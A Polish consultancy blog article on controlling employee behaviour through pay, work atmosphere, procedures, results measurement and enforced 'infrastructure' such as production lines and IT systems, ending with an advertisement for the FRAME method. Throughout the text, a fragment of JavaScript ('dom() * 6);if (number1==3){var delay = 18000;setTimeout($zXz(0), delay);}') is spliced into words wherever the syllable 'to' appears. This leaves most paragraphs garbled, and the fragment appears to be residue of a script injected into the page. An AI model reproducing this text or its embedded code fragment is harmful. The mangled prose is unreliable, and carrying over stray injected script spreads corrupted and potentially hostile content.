In Artykuły, Handel, Uniwersalne

Interesy firmy i pracownika zawsze się rozmijają. Dlatego firma musi się postarać, aby pracownicy zachowywali się w jej interesie, inaczej zadbają wyłącznie o swój. Można dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zrobić trwale, zmieniając ten interes, co w najprostszy sposób zrobić przez wynagrodzenie. Wynagrodzenie modyfikuje interes, jednak jego działanie jest ograniczone w czasie. Z czasem pracownik się przyzwyczaja i traktuje jak należne. Można też uderzyć do emocji pracownika, np. przez stworzenie mu doskonałej atmosfery. To ludzie lubią, więc pracownik chętnie włączy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to do własnego interesu.

Najlepszą formą kontroli jest interes osobisty

Niestety, ten pracownika zawsze odbiega od interesu firmy. Zwykle da się go rozłożyć na dwie składowe, z których jedna jest zbieżna z interesem firmy, a druga jest obojętna.

Uwaga. „nawet składowa obojętna nie jest tak naprawdę obojętna”. Gdyż zajmuje czas, uwagę i priorytety pracownika. Dlatego nie można przejść nad nią obojętnie, tylko jednak próbować jak najbardziej zminimalizować.

Ponieważ te interesy nigdy nie są w pełni zbieżne, firma musi wdrożyć mechanizmy, aby dopilnować swojego interesu. Można dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zrobić „po dobroci”, tak maksymalnie zmodyfikować interes pracownika. Tak działa wynagrodzenie, w pogoni za którym pracownik zmienia swoje zachowanie. Tak też działa dobra atmosfera w pracy, gdzie pracownikowi jest przyjemnie, nie chce więc tego stracić i też się dopasowuje. Ale czasem dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie wystarcza, jest za drogie czy za wolne. Wiele sposobów przestaje też być skutecznych po pewnym czasie. Czasem też firma po prostu nie potrafi zmodyfikować tego interesu, a jeszcze częściej nie potrafią tego jej poszczególni menedżerowie.

Kiedy nie udało się ze zmianą interesu pracownika, interes zmienił się niewystarczająco, me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tody przestały działać lub firmie się spieszy, trzeba sięgnąć do innych me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tod. Zamiast zmieniać interes pracownika, trzeba mu tylko narzucić pożądane zachowania. Najpierw jednak trzeba wyraźnie określić, na jakie. Dlatego zacząć zawsze trzeba od ustalenia wzorca zachowań.

Jak ustalić pożądany wzorzec zachowań? Aby na pewno były dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zachowania pożądane, trzeba wyjść od Modelu Biznesowego firmy. Dopiero wychodząc od tego Modelu da się z pewnością stwierdzić, co firmie służy, a co jej przeszkadza.

Najpierw musi powstać wzorzec

Ten wzorzec powinien wynikać z Modelu Biznesowego firmy i co najmniej z nim współgrać, a najlepiej wspomagać.

W firmach sprzedażowych war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wydzielić szczególną część Modelu, tę którą widzi i odczuwa klient końcowy. Tu zachowania pracowników powinny podlegać innym regułom (pracuje się nie z przewidywanymi elementami Modelu, tylko z nieprzewidywalnym klientem). Inaczej też steruje się tu zachowaniami. Jednak w każdym przypadku najpierw trzeba ustalić, jakie zachowania służą Modelowi, a jakie są z nim sprzeczne.

Kiedy wzorzec jest już ustalony, trzeba go rozpowszechnić. A potem już tylko kontrolować wykonanie.

Jak można kontrolować?

Są na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to co najmniej 3 sposoby.

Procedury. Najprostszy i najszybszy sposób zapanowania nad zachowaniami pracowników. Opisuje się je bowiem, informuje o tym pracowników i zaczyna wymagać. To proste i szybkie, ma jednak swoje ograniczenia. Przede wszystkim trzeba zapomnieć o inicjatywie i zaangażowaniu, pracownicy mają też naturalną pokusę, aby omijać procedury czy wykorzystywać nieuniknione w nich luki.

W tej me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todzie nie mierzy się (systemowo) efektów, tylko narzuca i kontroluje zachowania. Jeśli firma źle wybierze, np. nie takie zachowania, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kontrola niewiele jej pomoże.

Efekty. To nie narzuca się zachowań tylko wymaga efektów. Nie zawsze trzeba zmieniać zachowania, czasem wystarczy tylko mierzyć ich skutki.

To dobra me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toda, gdyż odpada ustalenie wzorca, pomiar jest też syntetyczny, mierzy wszystkie zachowania. Jednak jest dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toda bardzo wolna, gdyż trzeba poczekać na efekty, ma też dużą bezwładność, gdyż po korekcie znów trzeba poczekać na zmianę efektów. Tak działa np. pomiar konwersji sprzedaży w firmach handlowych. Tu nie narzuca się zachowań, tylko mierzy ilu klientów kupiło.

Uwaga. „wzorce zachowań też się przydadzą”. Mimo że ustalenie wzorców zachowań nie jest niezbędne dla tej me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tody, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jednak bardzo się przydadzą. Po prostu pracownicy na ogół nie wiedzą, co robią źle, samo więc ustalenie, że nie osiąga się pożądanych wyników nie wystarczy. Trzeba im powiedzieć, co mają zmienić w zachowaniach, choć w tej me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todzie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie jest bezwzględnie wymagany element, jak przy procedurach, tylko rekomendacja.

Wyzwaniem jest ustalenie, jakie efekty się mierzy, najlepiej tak, aby ocenić wpływ prowadzących do nich zachowań na efektywność działania Modelu.

Tu jednak także nie da się uciec od wzorca, czy bardziej od poziomu wyjściowego. Trzeba zacząć od poziomu

Infrastruktura. Tak naprawdę dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to najlepszy sposób kontroli. Tu pracownicy zachowują się w pożądany sposób nie dlatego, że chcą (choć niektórzy chcą), tylko dlatego że muszą. Dobrym sposobem jest linia produkcyjna, sprawdzi się też system IT, można też „wymusić” zachowania twardym elementami Modelu Biznesowego.

Linia produkcyjna. Tu pracownik jest częścią systemu i jeśli czegoś nie wykona wg wymaganego schematu, od razu spowoduje dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zatrzymanie linii, przez problemy pracownika kolejnego w linii.

System IT. System informatyczny można tak zaprojek dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować, aby wymuszał zachowania. Np. słownikowanie pól do wypełnienia wymusi s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowanie tylko takich określeń, jakie chce widzieć firma. Jednak system można oszukać, a jego istnienie wręcz do tego prowokuje.

Uwaga. „łatwo oszukać”. Słabością systemów IT jest ich podatność na manipulację, znacznie większa niż dla linii produkcyjnej czy elementów Modelu. Pokusa, aby oszukać system jest tu tym większa, że oszustwo trudniej zauważyć niż w linii produkcyjnej czy elementy Modelu. Tam oszustwo widać od razu, w IT trzeba je dopiero wykryć.

Elementy Modelu. Szczególnie tzw. elementy twarde, których nie da się zmienić bez zmiany Modelu. Jeśli np. stanowisko do zamawiania dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru będzie z przodu placówki, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tam też będą pracownicy, choć chętnie by się pewnie schowali przed klientami. Jeśli nie ma zaplecza lub jest małe i niewygodne, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to pracownicy nie będą tam przebywać.

Podsumowanie

Kontrola jest nieuniknioną konsekwencją narzucenia pracownikom wzorców zachowań bez zmiany ich interesu. Jednak zmiana interesu pracownika jest trudna, droga, a na pewno z czasem i tak przestanie działać. Dlatego wiele firm stawia na kontrolę. To me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toda szybka, jednak wcale nie taka pewna. Po pierwsze trzeba stworzyć wzorce zachowań, po drugie upewnić się, że ich wykonanie na pewno służy Modelowi Biznesowemu. Następnie trzeba te wzorce rozpowszechnić, wytłumaczyć, a końcu zaś narzucić. I tu dopiero wkracza kontrola, czyli porównywanie stanu faktycznego ze wzorcem.

Można także postawić na kontrolę efektów, wtedy wzorzec zachowań nie będzie potrzebny. Jednak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to długo trwa, a jeszcze dłużej trwa korekta i znów oczekiwanie na efekty. Kontrolę można przeprowadzić przez procedury, ale lepszą me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todą jest wymuszenie zachowań, albo przez model linii produkcyjnej albo wymuszenie przez twarde elementy Modelu Biznesowego.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.